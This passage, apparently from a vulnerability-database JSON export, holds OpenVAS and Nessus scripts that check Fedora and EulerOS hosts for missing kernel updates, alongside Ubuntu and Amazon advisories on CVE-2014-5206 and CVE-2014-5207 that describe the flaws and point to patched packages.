\"CVE-2013-6367\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for kernel FEDORA-2014-9466\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9466\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/136831.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.15.10~200.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3122", "CVE-2014-5077", "CVE-2013-2234", "CVE-2014-3940", "CVE-2013-4345", "CVE-2014-0155", "CVE-2013-2894", "CVE-2014-0131", "CVE-2013-2896", "CVE-2014-0100", "CVE-2014-1737", "CVE-2013-6378", "CVE-2014-4699", "CVE-2014-1874", "CVE-2013-2891", "CVE-2013-4254", "CVE-2013-2892", "CVE-2014-4508", "CVE-2014-1738", "CVE-2014-2568", "CVE-2014-4943", "CVE-2014-0206", "CVE-2013-1059", "CVE-2014-3145", "CVE-2014-4171", "CVE-2014-1446", "CVE-2014-5206", "CVE-2014-4014", "CVE-2013-2897", "CVE-2013-6368", "CVE-2014-3917", "CVE-2013-2232", "CVE-2014-2851", "CVE-2014-3534", "CVE-2014-2309", "CVE-2014-2678", "CVE-2013-6382", "CVE-2014-2039", "CVE-2014-5045", "CVE-2014-4715", "CVE-2013-4563", "CVE-2013-4579", "CVE-2014-3144", "CVE-2014-0102", "CVE-2013-6405", "CVE-2013-2899", "CVE-2014-3153", "CVE-2014-2580", "CVE-2013-4125", "CVE-2013-6367", "CVE-2014-0049", "CVE-2013-4387", "CVE-2013-6376", "CVE-2014-0055", "CVE-2013-4350", "CVE-2013-6380", "CVE-2013-0343", "CVE-2014-5207", "CVE-2014-1438", "CVE-2014-0077", "CVE-2013-4587", "CVE-2013-2895", "CVE-2013-4348", "CVE-2013-4470", "CVE-2013-4343", "CVE-2014-2523", "CVE-2013-2888", "CVE-2014-0101", "CVE-2014-0069", "CVE-2013-2889", "CVE-2013-2893"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-08-20T00:00:00", "id": "OPENVAS:1361412562310868102", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868102", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2014-9449", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2014-9449\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868102\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-20 05:52:44 +0200 (Wed, 20 Aug 2014)\");\n script_cve_id(\"CVE-2014-5206\", \"CVE-2014-5207\", \"CVE-2014-5077\", \"CVE-2014-4171\",\n \"CVE-2014-5045\", \"CVE-2014-3534\", \"CVE-2014-4943\", \"CVE-2014-4715\",\n \"CVE-2014-4699\", \"CVE-2014-0206\", \"CVE-2014-4508\", \"CVE-2014-4014\",\n \"CVE-2014-3153\", \"CVE-2014-3940\", \"CVE-2014-3917\", \"CVE-2014-3144\",\n \"CVE-2014-3145\", \"CVE-2014-1738\", \"CVE-2014-1737\", \"CVE-2014-3122\",\n \"CVE-2014-2851\", \"CVE-2014-0155\", \"CVE-2014-2678\", \"CVE-2014-2580\",\n \"CVE-2014-0077\", \"CVE-2014-0055\", \"CVE-2014-2568\", \"CVE-2014-0131\",\n \"CVE-2014-2523\", \"CVE-2014-2309\", \"CVE-2014-0100\", \"CVE-2014-0101\",\n \"CVE-2014-0049\", \"CVE-2014-0102\", \"CVE-2014-2039\", \"CVE-2014-0069\",\n \"CVE-2014-1874\", \"CVE-2014-1446\", \"CVE-2014-1438\", \"CVE-2013-4579\",\n \"CVE-2013-4587\", \"CVE-2013-6376\", \"CVE-2013-6368\", \"CVE-2013-6367\",\n \"CVE-2013-6405\", \"CVE-2013-6382\", \"CVE-2013-6380\", \"CVE-2013-6378\",\n \"CVE-2013-4563\", \"CVE-2013-4348\", \"CVE-2013-4470\", \"CVE-2013-4387\",\n \"CVE-2013-4345\", \"CVE-2013-4350\", \"CVE-2013-4343\", \"CVE-2013-2888\",\n \"CVE-2013-2889\", \"CVE-2013-2891\", \"CVE-2013-2892\", \"CVE-2013-2893\",\n \"CVE-2013-2894\", \"CVE-2013-2895\", \"CVE-2013-2896\", \"CVE-2013-2897\",\n \"CVE-2013-2899\", \"CVE-2013-0343\", \"CVE-2013-4254\", \"CVE-2013-4125\",\n \"CVE-2013-2232\", \"CVE-2013-1059\", \"CVE-2013-2234\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for kernel FEDORA-2014-9449\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9449\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/136869.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.14.17~100.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-17T15:49:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-19527", "CVE-2020-11494", "CVE-2019-5108", "CVE-2019-19054", "CVE-2020-8992", "CVE-2020-8648", "CVE-2020-12770", "CVE-2020-9383", "CVE-2017-8068", "CVE-2019-19533", "CVE-2017-13080", "CVE-2019-19534", "CVE-2019-19057", "CVE-2014-3180", "CVE-2019-19332", "CVE-2019-14901", "CVE-2017-13693", "CVE-2020-12826", "CVE-2014-4508", "CVE-2019-19524", "CVE-2020-10942", "CVE-2019-14896", "CVE-2019-19062", "CVE-2018-13093", "CVE-2019-19922", "CVE-2020-11609", "CVE-2020-10720", "CVE-2019-20636", "CVE-2019-19523", "CVE-2019-19768", "CVE-2020-12464", "CVE-2014-5206", "CVE-2019-19965", "CVE-2020-12654", "CVE-2018-9389", "CVE-2019-19227", "CVE-2019-19319", "CVE-2019-19531", "CVE-2016-3951", "CVE-2019-10220", "CVE-2019-19063", "CVE-2018-1000204", "CVE-2018-9383", "CVE-2019-14895", "CVE-2019-14897", "CVE-2019-19066", "CVE-2020-12653", "CVE-2019-19528", "CVE-2014-4608", "CVE-2020-11608", "CVE-2020-11668", "CVE-2016-9756", "CVE-2019-16230", "CVE-2020-13143", "CVE-2019-9458", "CVE-2017-12153", "CVE-2020-11565", "CVE-2020-8649", "CVE-2019-14898", "CVE-2020-12652", "CVE-2019-2215", "CVE-2019-19073", "CVE-2014-5207", "CVE-2020-8647", "CVE-2019-19530", "CVE-2019-19532", "CVE-2019-19074", "CVE-2019-18675", "CVE-2019-19537", "CVE-2020-2732", "CVE-2019-19966", "CVE-2019-19060", "CVE-2020-12655", "CVE-2019-19056", "CVE-2019-19536", "CVE-2019-20054", "CVE-2014-7970", "CVE-2019-20096"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-06-16T00:00:00", "published": "2020-06-16T00:00:00", "id": "OPENVAS:1361412562311220201674", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201674", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2020-1674)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1674\");\n script_version(\"2020-06-16T05:49:04+0000\");\n script_cve_id(\"CVE-2014-3180\", \"CVE-2014-4508\", \"CVE-2014-4608\", \"CVE-2014-5206\", \"CVE-2014-5207\", \"CVE-2014-7970\", \"CVE-2016-3951\", \"CVE-2016-9756\", \"CVE-2017-12153\", \"CVE-2017-13080\", \"CVE-2017-13693\", \"CVE-2017-8068\", \"CVE-2018-1000204\", \"CVE-2018-13093\", \"CVE-2018-9383\", \"CVE-2018-9389\", \"CVE-2019-10220\", \"CVE-2019-14895\", \"CVE-2019-14896\", \"CVE-2019-14897\", \"CVE-2019-14898\", \"CVE-2019-14901\", \"CVE-2019-16230\", \"CVE-2019-18675\", \"CVE-2019-19054\", \"CVE-2019-19056\", \"CVE-2019-19057\", \"CVE-2019-19060\", \"CVE-2019-19062\", \"CVE-2019-19063\", \"CVE-2019-19066\", \"CVE-2019-19073\", \"CVE-2019-19074\", \"CVE-2019-19227\", \"CVE-2019-19319\", \"CVE-2019-19332\", \"CVE-2019-19523\", \"CVE-2019-19524\", \"CVE-2019-19527\", \"CVE-2019-19528\", \"CVE-2019-19530\", \"CVE-2019-19531\", \"CVE-2019-19532\", \"CVE-2019-19533\", \"CVE-2019-19534\", \"CVE-2019-19536\", \"CVE-2019-19537\", \"CVE-2019-19768\", \"CVE-2019-19922\", \"CVE-2019-19965\", \"CVE-2019-19966\", \"CVE-2019-20054\", \"CVE-2019-20096\", \"CVE-2019-20636\", \"CVE-2019-2215\", \"CVE-2019-5108\", \"CVE-2019-9458\", \"CVE-2020-10720\", \"CVE-2020-10942\", \"CVE-2020-11494\", \"CVE-2020-11565\", \"CVE-2020-11608\", \"CVE-2020-11609\", \"CVE-2020-11668\", \"CVE-2020-12464\", \"CVE-2020-12652\", \"CVE-2020-12653\", \"CVE-2020-12654\", \"CVE-2020-12655\", \"CVE-2020-12770\", \"CVE-2020-12826\", \"CVE-2020-13143\", \"CVE-2020-2732\", \"CVE-2020-8647\", \"CVE-2020-8648\", \"CVE-2020-8649\", \"CVE-2020-8992\", \"CVE-2020-9383\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-16 05:49:04 +0000 (Tue, 16 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-16 05:49:04 +0000 (Tue, 16 Jun 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2020-1674)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1674\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1674\");\n script_xref(name:\"URL\", value:\"https://github.com/torvalds/linux/commit/a45b599ad808c3c982fdcdc12b0b8611c2f92824\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2020-1674 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In the Linux kernel before 5.5.8, get_raw_socket in drivers/vhost/ net.c lacks validation of an sk_family field, which might allow attackers to trigger kernel stack corruption via crafted system calls.(CVE-2020-10942)\n\nIn the Linux kernel 5.0.21, a setxattr operation, after a mount of a crafted ext4 image, can cause a slab-out-of-bounds write access because of an ext4_xattr_set_entry use-after-free in fs/ext4/xattr.c when a large old_size value is used in a memset call.(CVE-2019-19319)\n\nIn kernel/compat.c in the Linux kernel before 3.17, as used in Google Chrome OS and other products, there is a possible out-of-bounds read. restart_syscall uses uninitialized data when restarting compat_sys_nanosleep. NOTE: this is disputed because the code path is unreachable.(CVE-2014-3180)\n\nIn the Linux kernel 5.4.0-rc2, there is a use-after-free (read) in the __blk_add_trace function in kernel/trace/blktrace.c (which is used to fill out a blk_io_trace structure and place it in a per-cpu sub-buffer).(CVE-2019-19768)\n\nThere is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the vc_do_resize function in drivers/tty/vt/vt.c.(CVE-2020-8647)\n\nThere is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the vgacon_invert_region function in drivers/video/console/vgacon.c.(CVE-2020-8649)\n\ndrivers/gpu/drm/radeon/radeon_display.c in the Linux kernel 5.2.14 does not check the alloc_workqueue return value, leading to a NULL pointer dereference. NOTE: A third-party software maintainer states that the work queue allocation is happening during device initialization, which for a graphics card occurs during boot. It is not attacker controllable and OOM at that time is highly unlikely.(CVE-2019-16230)\n\nThere is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the n_tty_receive_buf_common function in drivers/tty/ n_tty.c.(CVE-2020-8648)\n\nA flaw was discovered in the way that the KVM hypervisor handled instruction emulation for an L2 guest when nested virtualisation is enabled. Under some circumstances, an L2 guest may trick the L0 guest into accessing sensitive L1 resources that should be inaccessible to the L2 guest.(CVE-2020-2732)\n\nAn issue was discovered in the Linux kernel through 5.5.6. set_fdc in drivers/block/floppy.c leads to a wait_til_ready out-of-bounds read because the FDC index is not checked for errors before assigning it, aka CID-2e90ca68b0d2.(CVE-2020-9383)\n\next4_protect_reserved_inode in fs/ext4/block_validity.c in the Linux kernel through 5.5.3 allows attackers to cause a denial of service (soft lockup) via a crafted journal size.(CVE-2020-8992)\n\nWi-Fi ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:04", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "description": "Eric W. Biederman discovered a flaw with the mediation of mount flags in \nthe Linux kernel's user namespace subsystem. An unprivileged user could \nexploit this flaw to by-pass mount restrictions, and potentially gain \nadministrative privileges. (CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounds when used with \nuser namespaces. An unprivileged local user could exploit this flaw to gain \nfull write privileges to a mount that should be read only. (CVE-2014-5206)", "edition": 5, "modified": "2014-08-18T00:00:00", "published": "2014-08-18T00:00:00", "id": "USN-2317-1", "href": "https://ubuntu.com/security/notices/USN-2317-1", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:39:57", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "description": "Eric W. Biederman discovered a flaw with the mediation of mount flags in \nthe Linux kernel's user namespace subsystem. An unprivileged user could \nexploit this flaw to by-pass mount restrictions, and potentially gain \nadministrative privileges. (CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounds when used with \nuser namespaces. An unprivileged local user could exploit this flaw to gain \nfull write privileges to a mount that should be read only. (CVE-2014-5206)", "edition": 5, "modified": "2014-08-18T00:00:00", "published": "2014-08-18T00:00:00", "id": "USN-2318-1", "href": "https://ubuntu.com/security/notices/USN-2318-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:35", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "description": "**Issue Overview:**\n\nfs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a \"mount -o remount\" command within a user namespace. \n\nThe do_remount function in fs/namespace.c in the Linux kernel through 3.16.1 does not maintain the MNT_LOCK_READONLY bit across a remount of a bind mount, which allows local users to bypass an intended read-only restriction and defeat certain sandbox protection mechanisms via a \"mount -o remount\" command within a user namespace.\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-tools-debuginfo-3.14.19-17.43.amzn1.i686 \n kernel-3.14.19-17.43.amzn1.i686 \n kernel-debuginfo-3.14.19-17.43.amzn1.i686 \n perf-3.14.19-17.43.amzn1.i686 \n kernel-tools-3.14.19-17.43.amzn1.i686 \n kernel-devel-3.14.19-17.43.amzn1.i686 \n kernel-tools-devel-3.14.19-17.43.amzn1.i686 \n perf-debuginfo-3.14.19-17.43.amzn1.i686 \n kernel-headers-3.14.19-17.43.amzn1.i686 \n kernel-debuginfo-common-i686-3.14.19-17.43.amzn1.i686 \n \n noarch: \n kernel-doc-3.14.19-17.43.amzn1.noarch \n \n src: \n kernel-3.14.19-17.43.amzn1.src \n \n x86_64: \n perf-debuginfo-3.14.19-17.43.amzn1.x86_64 \n kernel-devel-3.14.19-17.43.amzn1.x86_64 \n perf-3.14.19-17.43.amzn1.x86_64 \n kernel-3.14.19-17.43.amzn1.x86_64 \n kernel-debuginfo-3.14.19-17.43.amzn1.x86_64 \n kernel-tools-devel-3.14.19-17.43.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-3.14.19-17.43.amzn1.x86_64 \n kernel-tools-3.14.19-17.43.amzn1.x86_64 \n kernel-tools-debuginfo-3.14.19-17.43.amzn1.x86_64 \n kernel-headers-3.14.19-17.43.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-09-18T21:04:00", "published": "2014-09-18T21:04:00", "id": "ALAS-2014-417", "href": "https://alas.aws.amazon.com/ALAS-2014-417.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T10:13:07", "description": "The 3.15.10 stable update contains a number of important fixes across\nthe tree. Fix CVE-2014-5206, CVE-2014-5207: ro bind mount bypass with\nnamespaces\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-08-17T00:00:00", "title": "Fedora 20 : kernel-3.15.10-200.fc20 (2014-9466)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "modified": "2014-08-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-9466.NASL", "href": "https://www.tenable.com/plugins/nessus/77233", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9466.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77233);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5206\", \"CVE-2014-5207\");\n script_bugtraq_id(69214, 69216);\n script_xref(name:\"FEDORA\", value:\"2014-9466\");\n\n script_name(english:\"Fedora 20 : kernel-3.15.10-200.fc20 (2014-9466)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 3.15.10 stable update contains a number of important fixes across\nthe tree. Fix CVE-2014-5206, CVE-2014-5207: ro bind mount bypass with\nnamespaces\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1129662\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/136831.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e5d5b54d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"kernel-3.15.10-200.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:13:07", "description": "The 3.14.17 stable update contains a number of important fixes across\nthe tree. Fix CVE-2014-5206, CVE-2014-5207: ro bind mount bypass with\nnamespaces The 3.14.16 stable update contains a number of important\nfixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-08-20T00:00:00", "title": "Fedora 